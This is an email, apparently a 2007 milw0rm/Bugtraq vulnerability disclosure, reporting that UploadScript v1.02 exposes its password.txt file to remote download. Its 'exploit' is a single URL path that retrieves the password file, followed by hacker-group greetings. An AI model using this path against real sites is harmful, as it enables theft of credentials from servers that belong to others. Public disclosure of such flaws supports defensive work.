
Date: Mon, 22 Jan 2007 20:25:03 +0000
From: "me you" <r.5.7@...mail.com>
To: submit@...w0rm.com
Cc: bugtraq@...urityfocus.com
Subject: UploadScript <=- v1.02 (password.txt) Remote Password Disclosure Vulnerability

##############################################

UploadScript <=- v1.02 (password.txt) Remote Password Disclosure 
Vulnerability

Script: UploadScript

Version: v1.02

URL: 
http://www.uploadscript.net/demo/download.php?file=1478fb6c5c807cdf12dd69410e14d66d

Found By : BorN To K!LL

##############################################

Explo!T:.
^^^^^
www.site.com/[path]/password.txt

##############################################

GreeTz :.

Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  SHiKaA  ,  str0ke  ,  
ThE-LoRd-Of-CrAcKiNg ....

##############################################

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search! 
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

